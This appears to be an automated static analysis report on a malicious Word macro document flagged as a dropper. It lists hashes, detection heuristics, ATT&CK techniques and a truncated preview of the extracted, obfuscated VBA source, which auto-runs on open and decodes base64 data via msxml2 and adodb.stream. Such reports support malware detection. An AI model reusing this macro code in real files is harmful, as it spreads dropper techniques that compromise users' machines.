Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7aa51ea9215772ed…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 167.0 KB
Created: 2017-05-02 11:48:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 7752266ce9339de6cde4ce40436c3c60
SHA-1: 5155dcf9ede5638c67df022b6b8b2179cae9ca69
SHA-256: 7aa51ea9215772edb4f363427928d97ead17fd54dbb1572fd0b7e4ba0a0ebf13
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses Shell() and CreateObject() calls, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6306064-0' further supports its malicious nature. The VBA script attempts to create an msxml2.domdocument object, which is often used to download and process external content.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6306064-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6306064-0
  • VBA macros detected (medium; 4 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14659 bytes
SHA-256: 474d54896622c95cc84a8083c850cb89a1ec72b99c0e72da7b7c46500ad5969b
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim o9itHkOSK As Long
o9itHkOSK = 0
Dim avC2d
avC2d = Len(bEQOHjonJ)
Dim zrO890SZ As Single
zrO890SZ = Int(55243.723741358)
xi65KTM4Z
End Sub

Attribute VB_Name = "Module2"
Function DkHz23N(ByVal noECkTb)

Dim nNBHT As Double
nNBHT = 5173.0854656148
Dim eWfiweI As Single
eWfiweI = 43912.772216759
Dim Ovuoj As Byte
Ovuoj = 177
Dim Tv50dh8P As Single
Tv50dh8P = Round(4788.0466832183)
Dim aIa9UGrZu As Byte
aIa9UGrZu = 219
Dim F57kR
Dim rXQ41
Dim QtfQj7UK As Double
QtfQj7UK = Round(26976.07337495)
Dim hC10E6Gto As Byte
hC10E6Gto = 50
Dim XCyFq As Single
XCyFq = Sgn(6204.2047696134)

Dim wj0fc As Long
wj0fc = 0
Dim WMBdSyvwC As Single
WMBdSyvwC = 64724.471056475
Dim hHAnSRUd7
hHAnSRUd7 = StrConv(y2zRd, vbProperCase)
Set F57kR = CreateObject("msxml2.domdocument")

Dim aeCbgwh8 As Byte
aeCbgwh8 = 180
Dim GkeZP As Byte
GkeZP = 146
Dim cuh89 As Boolean
cuh89 = False
Dim Ww08oCNdi As Boolean
Ww08oCNdi = True
Dim TxaoMm As Long
TxaoMm = Sgn(0)
Set rXQ41 = F57kR.CreateElement("base64")

Dim MovKFRx7g As Long
MovKFRx7g = -1116398190
Dim KIZ26tWob As Long
KIZ26tWob = -1742339170
Dim QqQv5Gs As Boolean
QqQv5Gs = True
Dim aKun6 As String
aKun6 = AscB("a")
rXQ41.dataType = "bin.base64"

Dim KOzW9ft8s As Boolean
KOzW9ft8s = True
Dim QfoixF5
QfoixF5 = ""
Dim YzJ7Tm As String
YzJ7Tm = AscW("6")
Dim QKGArt As Double
QKGArt = 25116.737834828
Dim kAdpaG5 As Long
kAdpaG5 = -712602108
rXQ41.text = noECkTb

Dim cpthHvCk As Byte
cpthHvCk = 113
Dim dTS2VU As Long
dTS2VU = Sgn(-1912445104)
DkHz23N = lCwXNqIf9(rXQ41.nodeTypedValue)

Dim kBvJTjhx3 As Long
kBvJTjhx3 = 0
Dim kYXFWV7k As Boolean
kYXFWV7k = False
Set rXQ41 = Nothing
Set F57kR = Nothing
End Function
Function lCwXNqIf9(Binary)

Dim TpEkDRiq As Single
TpEkDRiq = 6495.2625005971
Dim cPXhZ6SC As String
cPXhZ6SC = "*"
Const HhbJ8Hlop = 2
Const UHTtVW = 1

Dim y9VfUwql1 As Boolean
y9VfUwql1 = True
Dim fkHNGb As Integer
fkHNGb = -7673
Dim Rewjs As Boolean
Rewjs = True
Dim idMyI As Long
idMyI = Sgn(0)
Dim JgrbLPsn

Dim D3WctPU As Long
D3WctPU = -1066645946
Dim VvTPI As Boolean
VvTPI = False
Dim E1Dkm As Byte
E1Dkm = 7

Dim TwtC61syl As Integer
TwtC61syl = 29851
Dim QbjJk As Byte
QbjJk = 103
Dim eS4D7n9 As Single
eS4D7n9 = 8747.025992792
Dim bLvh8lOIS As Single
bLvh8lOIS = Fix(49966.498031511)
Dim ytpb4cxS As Single
ytpb4cxS = 9902.2931860725
Set JgrbLPsn = CreateObject("adodb.stream")

Dim iv2Po6EZ As Boolean
iv2Po6EZ = False
Dim d2zNX7F As Long
d2zNX7F = Sgn(-314066216)
Dim rqpDRbnJi As Byte
rqpDRbnJi = 151
With JgrbLPsn
Dim orIpKb As Long
orIpKb = Sgn(-1001935252)
Dim vgiHYD As Boolean
vgiHYD = True
Dim q3HuDbmSw As Double
q3HuDbmSw = Sgn(54747.06748795)
.Type = UHTtVW
Dim eCL4iSc As Long
eCL4iSc = Sgn(0)
Dim UfTNaP As Long
UfTNaP = Sgn(-1375579846)
Dim h7RnI As Byte
h7RnI = 111
Dim ucs5CR As Boolean
ucs5CR = True
Dim wJqbH As Long
wJqbH = 0
.Open

Dim lQjA8 As Boolean
lQjA8 = True
Dim KVsro
KVsro = Len(brhe4w)
.Write Binary

Dim AQRrs51w As Byte
AQRrs51w = 129
Dim OIyzlWHQY As Long
OIyzlWHQY = Sgn(0)
.Position = 0

Dim klSDTe As Byte
klSDTe = 171
Dim WQtjAuzs5 As Integer
WQtjAuzs5 = Sgn(24182)
Dim nw4W1SIN As Byte
nw4W1SIN = 225
.Type = HhbJ8Hlop
Dim E0y6SP As Double
E0y6SP = Val(16004.594768499)
Dim d6HyA0S As Integer
d6HyA0S = Sgn(-6931)

Dim CVj2JLeg As Byte
CVj2JLeg = 25
Dim QXGBz As Byte
QXGBz = 3
.CharSet = "ascii"

Dim nh9Uwe As Boolean
nh9Uwe = True
Dim YNLcW9 As Single
YNLcW9 = 50893.808156209
lCwXNqIf9 = .ReadText
End With

Dim xefiz8xY As Byte
xefiz8xY = 5
Dim ZcnYV As String
ZcnYV = RTrim(F3Mm42xJ0)
Dim zS4uegq As Long
zS4uegq = -1386198312
Dim eHQGnutUf As Single

... (truncated)